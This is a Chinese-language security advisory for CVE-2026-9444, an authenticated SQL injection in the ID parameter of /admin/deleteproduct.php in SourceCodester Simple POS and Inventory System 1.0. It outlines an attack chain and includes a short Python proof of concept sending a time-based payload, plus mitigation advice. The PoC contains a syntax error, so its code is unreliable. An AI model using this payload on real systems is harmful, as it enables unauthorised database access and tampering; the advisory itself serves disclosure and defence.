CVE-2026-9444 CVSS 4.7 中危

CVE-2026-9444: Simple POS SQL注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9444

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Simple POS and Inventory System

漏洞概述

SourceCodester Simple POS and Inventory System 1.0版本存在SQL注入漏洞。该漏洞位于/admin/deleteproduct.php组件的delete函数中，由于对GET参数ID处理不当，导致攻击者可注入恶意SQL语句。利用此漏洞需高权限，可能导致数据泄露、篡改或丢失。

技术细节

该漏洞源于SourceCodester Simple POS and Inventory System 1.0在处理删除产品操作时，未能安全过滤通过GET参数传递的‘ID’。在`/admin/deleteproduct.php`文件中，该参数直接被拼接到SQL查询语句中执行，构成了经典的SQL注入漏洞。尽管CVSS评分显示攻击复杂度为低且无需用户交互，但利用此漏洞需要高权限（PR:H），意味着攻击者必须先获得管理员身份验证。一旦具备条件，攻击者可通过控制ID参数执行任意SQL命令，从而对数据库的机密性、完整性和可用性造成影响。鉴于利用代码已公开，相关系统需尽快修复。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者首先需要获取目标系统的管理员账户凭证，因为该漏洞的利用需要高权限（PR:H）。

STEP 2

2. 构造恶意请求

攻击者构造一个针对`/admin/deleteproduct.php`的HTTP GET请求，在`ID`参数中插入SQL注入Payload。

STEP 3

3. 发送攻击载荷

利用管理员Cookie发送请求，服务器端后端代码直接将未经过滤的`ID`参数拼接到SQL语句中执行。

STEP 4

4. 执行SQL命令

数据库执行恶意SQL语句，攻击者借此提取、修改或删除数据库中的敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-9444 SQL Injection

import requests

target_url = "http://target-ip/admin/deleteproduct.php"

# Attacker needs to be authenticated (High Privileges required)
cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Malicious payload for the ID parameter
# Example: ' OR SLEEP(5)--
payload = "1' OR SLEEP(5)--"

params = {
    "ID": payload
}

try:
    response = requests.get(target_url, params=params, cookies cookies)
    if response.elapsed.total_seconds() > 5:
        print("[+] Vulnerability confirmed: Time-based SQL injection detected.")
    else:
        print("[-] Vulnerability not detected or patch applied.")
except Exception as e:
    print(f"Error: {e}")

影响范围

SourceCodester Simple POS and Inventory System 1.0

防御指南

临时缓解措施

在未修复漏洞前，建议严格限制管理员账户的使用，并在Web应用防火墙（WAF）中添加规则，拦截针对`/admin/deleteproduct.php`的异常SQL查询请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9444
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9444
3 Details https://www.cvedetails.com/cve/CVE-2026-9444/
4 VulDB https://vuldb.com/cve/CVE-2026-9444
5 Link https://gist.github.com/c4ttr4ck/5d05aaee5b43f259ebe8bb8bce5c658f
6 Link https://vuldb.com/submit/813611
7 Link https://vuldb.com/vuln/365425
8 Link https://vuldb.com/vuln/365425/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表